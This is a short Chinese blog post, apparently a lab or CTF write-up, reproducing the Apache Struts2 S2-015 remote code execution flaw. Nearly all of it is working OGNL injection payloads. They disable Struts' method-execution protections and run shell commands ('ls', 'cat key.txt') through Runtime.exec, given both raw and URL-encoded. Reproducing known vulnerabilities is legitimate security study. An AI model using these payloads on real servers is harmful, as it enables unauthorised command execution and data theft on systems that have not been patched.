Apache Struts2远程代码执行漏洞(S2-015)复现

1. 输入/${1+1}.action,发现表达式被执行,证明存在漏洞

2.写入exp

${

#context[‘xwork.methodaccessor.denymethodexecution’]=false,

#m=#_memberaccess.getclass().getdeclaredfield(‘allowstaticmethodaccess’),

#m.setaccessible(true),

#m.set(#_memberaccess,true),

#q=@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(‘ls’).getinputstream()),

#q

}.action

3.执行失败,对exp进行url转码后再次写入

%24%7b%23context%5b%27xwork.methodaccessor.denymethodexecution%27%5d%3dfalse%2c
%23m%3d%23_memberaccess.getclass%28%29.getdeclaredfield%28%27allowstaticmethodaccess%27%29%2c
%23m.setaccessible%28true%29%2c
%23m.set%28%23_memberaccess%2ctrue%29%2c%23q%3d@org.apache.commons.io.ioutils@tostring%28@java.lang.runtime@getruntime%28%29.exec%28%27ls%27%29.getinputstream%28%29%29%2c%23q%7d.action

4.拿key

%24%7b
%23context%5b%27xwork.methodaccessor.denymethodexecution%27%5d%3dfalse%2c
%23m%3d%23_memberaccess.getclass%28%29.getdeclaredfield%28%27allowstaticmethodaccess%27%29%2c
%23m.setaccessible%28true%29%2c
%23m.set%28%23_memberaccess%2ctrue%29%2c%23q%3d@org.apache.commons.io.ioutils@tostring%28@java.lang.runtime@getruntime%28%29.exec%28%27cat%20key.txt%27%29.getinputstream%28%29%29%2c%23q%7d.action

payload

/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action

解码后

/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat key.txt').getInputStream()),#q}.action
点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注